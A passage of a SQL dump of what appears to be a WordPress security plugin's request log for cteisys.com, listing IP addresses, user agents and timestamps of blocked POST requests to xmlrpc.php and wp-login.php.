Chrome\\/64.0.3282.140 Safari\\/537.36\"}','cymWvEMY2ZutpLOb0nXDeCIg',0,1665464943.4409,1683,'','POST',403,0,600,0,1,'',0),('83.143.116.3',1401910275,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qByA4CITLNuMrdGKXVzeEZ5b',0,1665471460.6588,1641,'','POST',403,0,515,0,1,'',0),('205.185.116.162',3451483298,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/42.0.2311.90 Safari\\/537.36\",\"2\":\"http:\\/\\/www.google.com.hk\"}','L9SEjZqYniaGFpmNeXHBMgA8',0,1665471312.8337,19881,'','POST',403,0,515,0,1,'',0),('172.104.219.25',2892552985,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','t4RvHB569PMSceo0ixrVIp8L',0,1665471422.8463,18311,'','POST',403,0,600,0,1,'',0),('137.184.124.136',2310569096,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','6fIjgJU5ly4ZFHGTKdxD9aQM',0,1665471000.7116,1890,'','POST',403,0,600,0,1,'',0),('167.71.111.16',2806476560,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gxw1Ffz64onkyG8UhbPsLN3Y',0,1665470685.6596,19239,'','POST',403,0,515,0,1,'',0),('119.18.52.177',1997681841,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bjoE61marJuZtMTHdQeUsPkn',0,1665470918.0286,18648,'','POST',403,0,515,0,1,'',0),('185.190.142.217',3116273369,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','BE5tNF9mYHh83WayUjqeMnfQ',0,1665470419.8876,17731,'','POST',403,0,600,0,1,'',0),('45.14.224.167',755949735,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','V7pvkQ86DNfbS34TmWixAoOh',0,1665470112.8877,19637,'','POST',403,0,515,0,1,'',0),('65.0.178.38',1090564646,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tO2TAMQzBxmISL0fyiJk8nPs',0,1665469911.4806,18649,'','POST',403,0,515,0,1,'',0),('13.76.135.117',223119221,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2G9gcPKJXpuMe8YxAbZlqCzN',0,1665469703.1286,18775,'','POST',403,0,515,0,1,'',0),('51.210.99.98',869426018,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gQdIrX1v3AFp8Njsnz5BS4kq',0,1665469490.3707,1867,'','POST',403,0,515,0,1,'',0),('147.135.255.8',2475163400,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','cZFLu0whKG28NVCkBvIU3Olp',0,1665469421.3187,1297,'','POST',403,0,600,0,1,'',0),('162.240.211.236',2733691884,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pV5MJmrPDIHsuftiaYO4xkQG',0,1665468852.0513,18784,'','POST',403,0,515,0,1,'',0),('157.0.140.186',2634058938,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tyWDR7PfE5nCv1eKSM9UAXh6',0,1665469311.9873,18619,'','POST',403,0,515,0,1,'',0),('51.210.99.98',869426018,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','miYpEnzrLqUPfR2BZtI6bgQu',0,1665468448.1754,1172,'','POST',403,0,515,0,1,'',0),('54.37.254.14',908459534,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','4kyFGRhT3nDXgN6CaLwfY8pe',0,1665468426.2824,18002,'','POST',403,0,600,0,1,'',0),('162.241.85.212',2733725140,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3c8desbrLVyYUf27FWgRC0AE',0,1665468229.3851,1762,'','POST',403,0,515,0,1,'',0),('198.211.125.40',3335748904,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MmXYFDNjovzZintlVas6EqWB',0,1665468020.9480,1845,'','POST',403,0,515,0,1,'',0),('185.252.31.59',3120308027,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SBNfGcpKZQj2MlU4aeui1JH0',0,1665482214.0496,19268,'','POST',403,0,515,0,1,'',0),('172.96.182.142',2892019342,'','http://cteisys.com/wp-static.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cteisys.com\"}','JAPZcYthipkS0KGljyvMVdz4',0,1665481882.0135,11712,'','GET',403,0,700,0,1,'',0),('115.79.139.135',1934592903,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','NDbQ197tS3TKJG4lkxRy5BiX',0,1665478581.9312,1192,'','POST',403,0,600,0,1,'',0),('217.21.74.226',3642051298,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','oEbBzRTFV7H8KdO90lCtxkDI',0,1665475037.2224,1525,'','POST',403,0,600,0,1,'',0),('133.130.103.36',2239915812,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','iafANRmoKCU1z5WOuvq9Jp4G',0,1665474451.0232,1427,'','POST',403,0,600,0,1,'',0),('66.29.138.73',1109232201,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HE9ItbBR4jch526wk7eiQKWm',0,1665474305.9942,2037,'','POST',403,0,515,0,1,'',0),('64.235.231.20',1089201940,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ynAGLRolf0kijM32hdaOv5Hq',0,1665474082.4515,1888,'','POST',403,0,515,0,1,'',0),('171.244.21.74',2884900170,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','a4BpW6qCDjLoEf7NJk9yrQRx',0,1665473838.0455,1541,'','POST',403,0,515,0,1,'',0),('67.23.254.254',1125646078,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lB8XJkO3omwyjWeKxv0Lfg6d',0,1665473610.9957,18365,'','POST',403,0,515,0,1,'',0),('103.171.181.53',1739306293,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0LbVz6QWrHAPIRsUSdte84jp',0,1665473390.3252,18645,'','POST',403,0,515,0,1,'',0),('157.230.44.8',2649107464,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','c0AhRHFtWMCELPXl8xf1Jjm9',0,1665473444.1556,598,'','POST',403,0,600,0,1,'',0),('188.166.61.228',3165011428,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','OG2pXgmE5ZkydPrFIfVi8UTA',0,1665473010.6472,615,'','POST',403,0,600,0,1,'',0),('159.65.149.229',2671875557,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5b1iGUDKTeuR9ZgMrdLOkVqx',0,1665472972.9687,18895,'','POST',403,0,515,0,1,'',0),('51.68.228.235',860153067,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','9xqBoGufZ6lRIKHMdwX82OTb',0,1665472503.9948,2847,'','POST',403,0,515,0,1,'',0),('195.225.76.130',3286322306,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','saB5DRcqd0Qfj9vwVt2FZJkW',0,1665472721.2538,1681,'','POST',403,0,515,0,1,'',0),('144.91.88.30',2421905438,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','TRwKoUksc7LSge5uqV1Ojz9B',0,1665472429.4436,17482,'','POST',403,0,600,0,1,'',0),('103.154.177.165',1738191269,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','QYKrGOgFJWpmRyzCxaVE1HN9',0,1665472270.0569,18571,'','POST',403,0,515,0,1,'',0),('72.29.76.78',1209879630,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','EOditeJoz6GyhVBbR9FLYDgj',0,1665472085.9572,2573,'','POST',403,0,515,0,1,'',0),('165.22.198.112',2769733232,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','UdVhJCvGYm3T74EIQSWf1sxP',0,1665472002.3087,17956,'','POST',403,0,600,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/42.0.2311.90 Safari\\/537.36\",\"2\":\"http:\\/\\/www.google.com.hk\"}','kYbmqe9HV50DPLtzCjp7NKIE',0,1665478543.1503,1649,'','POST',403,0,515,0,1,'',0),('94.231.86.20',1592219156,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','QBe1W6nytiuFGOzEjM0JSNHm',0,1665478138.5894,468,'','POST',403,0,600,0,1,'',0),('103.153.214.231',1738135271,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tNMhG0kXwoFx3Jn7lU6KHadi',0,1665478198.9161,1189,'','POST',403,0,515,0,1,'',0),('150.95.112.79',2522837071,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','67F9anyWYhgVSXzP0GDCZmcp',0,1665478436.4570,2857,'','POST',403,0,515,0,1,'',0),('122.17.148.164',2047972516,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BLqH9j4QhrYsiol358yEeMID',0,1665477926.1472,18509,'','POST',403,0,515,0,1,'',0),('101.99.90.175',1701010095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','J5KRoTpn38vkIC46OMsteXrW',0,1665477689.8797,2902,'','POST',403,0,515,0,1,'',0),('212.103.4.29',3563521053,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','MnYFRjcltr3L1e9GgmqNyJXu',0,1665477543.8486,4132,'','POST',403,0,600,0,1,'',0),('46.101.117.50',778401074,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LTH6jeBJSWoxIsdyPq5MpkRc',0,1665477180.2276,3104,'','POST',403,0,515,0,1,'',0),('43.231.112.85',736587861,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xYevDn8LZjcUNVs54TlMXoOE',0,1665476911.4870,1564,'','POST',403,0,515,0,1,'',0),('77.65.212.122',1296159866,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','qT5O80fQtVJG9gmcLh4X71Ul',0,1665477108.2476,11728,'','POST',403,0,600,0,1,'',0),('139.59.6.209',2335901393,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fxkSUYIliXgORnK6owC9FL3u',0,1665476671.3215,1244,'','POST',403,0,515,0,1,'',0),('34.76.63.113',575422321,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','rGytoacbShzx4PdTF5BmvLKe',0,1665476529.6339,1185,'','POST',403,0,600,0,1,'',0),('85.95.146.83',1432326739,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','WOCtur7YUIFdKVgoTAj1mhci',0,1665476408.2269,709,'','POST',403,0,515,0,1,'',0),('185.183.122.143',3115809423,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ilAwGz3DIRmM8OyxbeVL752h',0,1665476196.8465,18896,'','POST',403,0,515,0,1,'',0),('159.65.200.228',2671888612,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','lUbZQgWrSECNIYXepijGRc2h',0,1665476074.8636,1476,'','POST',403,0,600,0,1,'',0),('67.23.254.254',1125646078,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fUjRCBq0FSKdbs5rT9pDlJaY',0,1665475709.0704,2454,'','POST',403,0,515,0,1,'',0),('139.59.117.30',2335929630,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8Hc4Uj0BeukPJRoLhViEI2fv',0,1665475439.4089,1583,'','POST',403,0,515,0,1,'',0),('46.63.80.162',775901346,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','RUD5nZ7d3yFk41AclzvqKCjS',0,1665475476.3231,629,'','POST',403,0,600,0,1,'',0),('124.158.12.83',2090732627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','v9RzY4Ve5mDo8LaEbOZtd1cf',0,1665475214.1361,3127,'','POST',403,0,515,0,1,'',0),('69.163.224.107',1168367723,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','tE9fq6YCST4o0JFgrQDNdueZ',0,1665481697.4647,9406,'','POST',403,0,600,0,1,'',0),('81.88.53.17',1364735249,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','P435YIOZqSdwcitUKT9mCBzL',0,1665481624.0904,18827,'','POST',403,0,515,0,1,'',0),('188.212.34.36',3168018980,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','klG8YDRFfro2Ji0xtNQu6bhv',0,1665481394.4571,19817,'','POST',403,0,515,0,1,'',0),('85.95.146.83',1432326739,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8BtcDu5xQhMyeWLS2CZKrmEo',0,1665481084.1180,18675,'','POST',403,0,515,0,1,'',0),('46.63.80.162',775901346,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','5gz2pGFrPxj6CaJ3MsdlOAKH',0,1665481255.5953,17400,'','POST',403,0,600,0,1,'',0),('177.222.54.214',2984130262,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','eLViJBTEmRzr3l79NkZ4oh1c',0,1665480838.3010,19850,'','POST',403,0,515,0,1,'',0),('202.29.236.140',3390958732,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','w2bBjWAE9z3JRFSfi0hsI7DT',0,1665480660.1441,18130,'','POST',403,0,600,0,1,'',0),('109.168.97.89',1839751513,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','EZol1pF2NP3h5usVJBRK9tcv',0,1665480216.7502,17387,'','POST',403,0,600,0,1,'',0),('51.255.64.58',872366138,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','C8o7vt91LweDOpkhauXK2QPA',0,1665480578.4642,18514,'','POST',403,0,515,0,1,'',0),('66.175.217.71',1118820679,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','K6hd3YwFMfjxZWO4pe7UEruc',0,1665479997.5542,18720,'','POST',403,0,515,0,1,'',0),('192.115.100.180',3228787892,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VeP3XGtFRzATkvxNMsj20Hr5',0,1665479799.9787,18555,'','POST',403,0,515,0,1,'',0),('46.101.150.34',778409506,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','U3KNusMTRcGHpeg0lWOykXIS',0,1665479624.3691,1329,'','POST',403,0,600,0,1,'',0),('103.27.238.234',1729883882,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','oPHQpx7DycTWL38zq6bsmfrd',0,1665479506.6294,19031,'','POST',403,0,515,0,1,'',0),('39.107.137.177',661359025,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','U50hl2aX9oIRTFwx1dturMv8',0,1665479269.5359,1875,'','POST',403,0,515,0,1,'',0),('188.165.198.224',3164980960,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','Cn82hGRSFPWTHiLBkYdfrutb',0,1665479180.5155,1192,'','POST',403,0,600,0,1,'',0),('158.255.80.210',2667532498,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XKLOJDryel7uMBqQTxkv2mUV',0,1665478986.5642,3143,'','POST',403,0,515,0,1,'',0),('212.110.92.155',3564002459,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','AFcMdU1YtgEpsKvf3RjHkb6y',0,1665485854.8301,501,'','POST',403,0,600,0,1,'',0),('124.70.98.118',2084987510,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NEXgYt4IP5liDrMmswVjebnC',0,1665485799.0546,18127,'','POST',403,0,515,0,1,'',0),('146.148.44.185',2459184313,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','9jcmSerwBZNQ7CEa3bzsX0nP',0,1665485415.2230,17425,'','POST',403,0,600,0,1,'',0),('13.76.135.117',223119221,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZWpNVRTSc7nxDP6flwrJI23a',0,1665484938.0324,1220,'','POST',403,0,515,0,1,'',0),('149.248.59.66',2516073282,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','UXGZasHY17A0xr9klhc6nW4p',0,1665484822.8096,1606,'','POST',403,0,600,0,1,'',0),('103.129.222.91',1736564315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','t59HSOGdPYilANueRjrhTxLw',0,1665484391.7991,1931,'','POST',403,0,600,0,1,'',0),('158.255.80.210',2667532498,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cxbJM1kBn72ugmOatC5iZqlW',0,1665484688.3392,19019,'','POST',403,0,515,0,1,'',0),('104.248.80.191',1761104063,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','t5gTurORqoEP3mhSpaj1fHDV',0,1665484370.0797,18985,'','POST',403,0,515,0,1,'',0),('66.29.138.73',1109232201,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lQfvJyIjEhLt9xVu1p7sgRMP',0,1665484129.1160,20170,'','POST',403,0,515,0,1,'',0),('167.71.141.164',2806484388,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','E3KwAYPZz1IRrHu6tfB2bldG',0,1665483787.3866,17629,'','POST',403,0,600,0,1,'',0),('207.154.250.8',3483040264,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','P70c3EOBUYkfrtVx182pCLhn',0,1665483339.9174,18440,'','POST',403,0,600,0,1,'',0),('148.72.244.254',2487809278,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','kW1socn7TdLPjQJHeRNhg4xA',0,1665483264.5920,18679,'','POST',403,0,515,0,1,'',0),('217.174.248.107',3652122731,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','EMFSl3Atj4X7xOIqJT5ienk8',0,1665483011.4634,18754,'','POST',403,0,515,0,1,'',0),('80.251.219.111',1358682991,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','M2fUBOHu91tPYVszhw5xc0RZ',0,1665482744.6441,14408,'','POST',403,0,515,0,1,'',0),('14.225.255.250',249692154,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','Jfnr5TOziQ6HgheLXxwWqCcE',0,1665482740.5152,16648,'','POST',403,0,600,0,1,'',0),('195.93.152.83',3277690963,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','az6HFk8O1CDKZB5v0rQMiWw9',0,1665482492.0327,18551,'','POST',403,0,515,0,1,'',0),('18.224.85.64',316691776,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 